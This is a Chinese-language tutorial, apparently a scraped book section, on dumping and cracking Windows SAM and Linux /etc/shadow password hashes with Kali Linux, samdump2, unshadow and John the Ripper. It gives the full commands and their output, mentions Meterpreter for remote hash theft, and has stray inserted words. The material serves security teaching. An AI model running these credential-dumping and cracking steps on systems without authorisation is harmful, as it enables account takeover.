windows8開機(jī)密碼破解(windows8設(shè)置開機(jī)密碼)當(dāng)忘記操作系統(tǒng)的密碼或者攻擊某臺(tái)主機(jī)時(shí)，需要知道該系統(tǒng)中某個(gè)用戶的用戶名和密碼。本節(jié)將分別介紹破解Windows和Linux用戶密碼。8.6.1 破解Windows用戶密碼Windows系統(tǒng)的用戶名和密碼保存在SAM（安全賬號(hào)管理器）文件中。在基于NT內(nèi)核的Windows系統(tǒng)中，包括Windows 2000及后續(xù)版本，這個(gè)文件保存在“C:\Windows\System32\Config”目錄下。出于安全原因，微軟特定添加了一些額外的安全措施將該文件保護(hù)了起來。首先，操作系統(tǒng)啟動(dòng)之后，SAM文件將同時(shí)被鎖定。這意味著操作系統(tǒng)電腦運(yùn)行之時(shí)，用戶無法打開或復(fù)制SAM文件。除了鎖定，整個(gè)SAM文件還經(jīng)過加密，且不可見。幸運(yùn)的是，現(xiàn)在有辦法繞過這些限制。在遠(yuǎn)程計(jì)算機(jī)上，只要目標(biāo)處于運(yùn)行狀態(tài)，就可以利用Meterpreter和SAM Juicer獲取計(jì)算機(jī)上的散列文件。獲得訪問系統(tǒng)的物理權(quán)限之后，用戶就可以在其上啟動(dòng)其他的操作系統(tǒng)，如在USB或DVD-ROM設(shè)備上的Kali Linux。啟動(dòng)目標(biāo)計(jì)算機(jī)進(jìn)入到其他的操作系統(tǒng)之后，用戶可以使用Kali中的John the Ripper工具來破解該Windows用戶密碼。使用John the Ripper工具破解Windows用戶密碼。具體操作步驟如下所示。（1）檢查當(dāng)前系統(tǒng)中的硬盤驅(qū)動(dòng)。執(zhí)行命令如下所示：輸出的信息表示當(dāng)前系統(tǒng)中有一塊磁盤，并只有一個(gè)分區(qū)。該文件系統(tǒng)類型是NTFS，也是Windows系統(tǒng)的所存放的磁盤。（2）掛載硬盤驅(qū)動(dòng)。執(zhí)行命令如下所示：root@kali:~# mkdir /sda1#創(chuàng)建掛載點(diǎn)root@kali:~# mount /dev/sda1 /sda1/#掛載/dev/sda1分區(qū)執(zhí)行以上命令后，沒有任何輸出信息。（3）切換目錄，進(jìn)入到Windows SAM文件的位置。執(zhí)行命令如下所示：root@kali:~# cd /sda1/WINDOWS/system32/config/在該目錄中，可以看到SAM文件。電腦（4）使用SamDump2提取SAM文件。執(zhí)行命令如下所示：root@kali:/sda1/WINDOWS/system32/config# samdump2 SAM system > /root/hash.txtsamdump2 1.1.1 by Objectif Securitehttp://www.objectif-securite.choriginal author: ncuomo@studenti.unina.itRoot Key : SAM從輸出信息中可以看到提取了SAM文件。將該文件的內(nèi)容重定向到了/root/hash.txt文件中。（5）運(yùn)行john命令，實(shí)現(xiàn)密碼攻擊。執(zhí)行命令如下所示：root@kali:/sda1/WINDOWS/system32/config# /usr/sbin/john /root/hash.txt --format=ntCreated directory: /root/.johnLoaded 6 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32]) (Guest)guesses: 4 time: 0:00:03:13 0.09% (3) (ETA: Mon May 12 06:46:42 2014) c/s: 152605K trying: 2KRIN.P - 2KRIDY8guesses: 4 time: 0:00:04:26 0.13% (3) (ETA: Mon May 12 04:02:53 2014) c/s: 152912K trying: GR0KUHI - GR0KDN1guesses: 4 time: 0:00:04:27 0.13% (3) (ETA: Mon May 12 04:15:42 2014) c/s: 152924K trying: HKCUUHT - 電腦 HKCUGDS8.6.2 破解Linux用戶密碼破解Linux的密碼基本上和破解Windows密碼的方法非常類似，在該過程中只有一點(diǎn)不同。Linux系統(tǒng)沒有使用SAM文件夾來保存密碼散列。Linux系統(tǒng)將加密的密碼散列包含在一個(gè)叫做shadow的文件里，該文件的絕對(duì)路徑為/etc/shadow。不過，在使用John the Ripper破解/etc/shadow文件之前，還需要/etc/passwd文件。這和提取Windows密碼散列需要system文件和SAM文件是一樣的道理。John the Ripper自帶了一個(gè)功能，它可以將shadow和passwd文件結(jié)合在一起，這樣就可以使用該工具破解Linux系統(tǒng)的用戶密碼。本小節(jié)將介紹破解Linux用戶密碼的方法。使用John the Ripper工具破解Linux用戶密碼。具體操作步驟如下所示。（1）使用unshadow提取密碼散列。執(zhí)行命令如下所示：root@kali:~# unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes.txt執(zhí)行以上命令后，會(huì)將/etc/passwd/文件與/etc/shadow/文件結(jié)合在一起，生成一個(gè)叫做linux_hashes.txt的文件，保存在/tmp/目錄中。（2）破解Linux用戶密碼。執(zhí)行命令如下所示：root@kali:~# john --format=crypt --show /tmp/linux_hashes.txtroot:123456:0:0:root:/root:/bin/bashbob:123456:1000:1001::/home/bob:/bin/shalice:123456:1001:1002::/home/alice:/bin/sh3 password hashes cracked, 0 left從輸出的結(jié)果中，可以看到當(dāng)前系統(tǒng)中共有三個(gè)用戶，其密碼都為123456。注意：使用John the Ripper開始破解Linux密碼之前，需要使用支持破解不同類型密碼散列的John the Ripper版本。如果用錯(cuò)版本或者使用未打補(bǔ)丁的John the Ripper，程序?qū)⒎祷劐e(cuò)誤信息No password hashes loaded（沒有價(jià)值密碼散列）。大多數(shù)現(xiàn)代Linux系統(tǒng)都使用SHA散列加密算法保存密碼。